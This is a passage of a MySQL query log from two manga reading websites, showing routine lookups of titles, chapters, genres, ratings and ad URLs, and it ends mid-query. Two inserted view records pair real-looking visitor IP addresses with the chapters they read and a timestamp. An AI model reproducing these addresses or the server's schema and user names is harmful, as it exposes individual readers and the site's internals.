330646388 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '245' and m.active = 1 330646388 Quit 330646389 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646389 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='245' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%') ORDER BY RAND() limit 10 330646389 Quit 330646390 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646391 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646390 Quit 330646391 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646391 Quit 330646392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646392 Quit 330646393 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646393 Quit 330646394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646394 Quit 330646395 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646395 Quit 330646396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646396 Quit 330646397 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646397 Quit 330646398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646398 Quit 330646399 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330646370 Quit 330646400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646400 Quit 330646401 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646401 Quit 330646402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646402 Quit 330646403 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646403 Quit 330646404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646404 Quit 330646405 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646405 Quit 330646406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646406 Quit 330646407 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646407 Quit 330646408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646408 Quit 330646409 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17678' 330646409 Quit 330646410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646410 Query select * FROM chapters where id = '17678' 330646410 Quit 330646411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646411 Query select * FROM chapters where manga_id = '274' order by id desc 330646411 Quit 330646412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646412 Query Update chapters set view=view+1 where id = '17678' 330646412 Quit 330646413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646413 Query select * FROM chapters where id = '17678' 330646413 Quit 330646414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646414 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17678' 330646414 Quit 330646415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646415 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('274', '17678', '2001:4c3c:af00:ce00:c980:ead7:84a5:b77d', 'mangacherri.com', '2026-02-26 03:28:45', '2026-02-26 03:28:45') 330646415 Quit 330646416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646416 Query select * FROM chapter_images where chapter_id = '17678' 330646417 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646418 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646417 Quit 330646418 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11644' and m.active = 1 330646418 Quit 330646419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646419 Query select * FROM chapters where id = '11644' 330646419 Quit 330646420 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646420 Query select * FROM chapters where manga_id = '245' order by display_priority ASC, id desc 330646420 Quit 330646421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646421 Query Update chapters set view=view+1 where id = '11644' 330646378 Quit 330646422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646422 Quit 330646421 Quit 330646423 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646424 Query select * FROM chapters where id = '11644' 330646423 Quit 330646424 Quit 330646425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646425 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11644' and m.active = 1 330646425 Quit 330646426 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646426 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('245', '11644', '47.79.205.19', 'mangaberri.com', '2026-02-26 03:28:45', '2026-02-26 03:28:45') 330646426 Quit 330646427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646427 Query select * FROM chapter_images where chapter_id = '11644' 330646427 Quit 330646428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646428 Quit 330646429 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '245' and m.active = 1 330646430 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646429 Quit 330646430 Quit 330646431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646431 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='245' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%') ORDER BY RAND() limit 10 330646432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646433 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646432 Quit 330646433 Quit 330646434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646434 Quit 330646435 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646435 Quit 330646431 Quit 330646436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646436 Quit 330646437 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646437 Quit 330646438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646438 Quit 330646439 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646439 Quit 330646440 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646440 Quit 330646441 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646441 Quit 330646442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330646443 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646443 Quit 330646442 Quit 330646416 Quit 330646444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646444 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '274' and m.active = 1 330646444 Quit 330646445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646445 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='274' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:28:46 330646399 Quit 330646446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646446 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330646447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646447 Quit 330646448 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'living-together-with-the-queen-from-my-high-school-days-who-was-arrogant-surprisingly-isnt-that-uncomfortable' 330646446 Quit 330646449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646449 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330646448 Quit 330646450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646450 Query select * FROM chapters where manga_id = '206' order by id desc 330646449 Quit 330646451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646451 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330646450 Quit 330646452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646452 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '206' and m.active = 1 330646452 Quit 330646453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646453 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='206' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Mystery%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%') ORDER BY RAND() limit 10 330646451 Quit 330646454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646454 Quit 330646455 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646455 Quit 330646456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330646456 Quit 330646457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330646457 Quit 330646458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330646458 Quit 330646459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330646459 Quit 330646460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330646460 Quit 330646461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330646461 Quit 330646462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330646462 Quit 330646463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330646463 Quit 330646464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330646464 Quit 330646465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330646465 Quit 330646466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330646466 Quit 330646467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646467 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330646467 Quit 330646468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330646468 Quit 330646469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646469 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330646469 Quit 330646470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330646470 Quit 330646471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646471 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330646471 Quit 330646472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330646472 Quit 330646473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646473 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330646473 Quit 330646474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330646474 Quit 330646475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646475 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330646475 Quit 330646476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330646476 Quit 330646477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646477 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330646477 Quit 330646478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330646478 Quit 330646479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646479 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330646479 Quit 330646480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330646480 Quit 330646481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646481 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330646481 Quit 330646482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330646482 Quit 330646483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646483 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330646483 Quit 330646484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330646484 Quit 330646485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646485 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330646485 Quit 330646486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330646486 Quit 330646487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646487 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330646487 Quit 330646488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330646488 Quit 330646489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646489 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330646489 Quit 330646490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330646490 Quit 330646491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646491 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330646491 Quit 330646492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330646492 Quit 330646493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646493 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 330646493 Quit 330646494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330646494 Quit 330646495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646495 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330646495 Quit 330646496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330646496 Quit 330646497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646497 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330646497 Quit 330646498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330646498 Quit 330646499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646499 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 330646499 Quit 330646500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330646500 Quit 330646501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646501 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330646501 Quit 330646502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330646502 Quit 330646503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646503 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 330646503 Quit 330646504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330646504 Quit 330646505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646505 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330646505 Quit 330646506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330646506 Quit 330646507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646507 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330646507 Quit 330646508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330646508 Quit 330646509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646509 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330646509 Quit 330646510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330646510 Quit 330646511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646511 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330646511 Quit 330646512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330646512 Quit 330646513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646513 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330646513 Quit 330646514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330646514 Quit 330646515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646515 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330646515 Quit 330646516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330646516 Quit 330646517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646517 Query select * FROM chapters where manga_id = '240' order by created desc limit 1 330646517 Quit 330646518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330646518 Quit 330646519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646519 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330646519 Quit 330646520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330646520 Quit 330646521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646521 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330646445 Quit 330646522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646522 Quit 330646523 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330646523 Quit 330646521 Quit 330646524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330646524 Quit 330646525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646525 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330646526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646526 Quit 330646527 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646527 Quit 330646528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646528 Quit 330646529 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646529 Quit 330646530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646530 Quit 330646531 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330646531 Quit 330646525 Quit 330646532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330646532 Quit 330646533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646533 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330646533 Quit 330646534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330646534 Quit 330646535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330646535 Quit 330646536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330646536 Quit 330646537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330646537 Quit 330646538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330646538 Quit 330646539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330646539 Quit 330646540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330646540 Quit 330646541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330646541 Quit 330646542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330646542 Quit 330646543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = 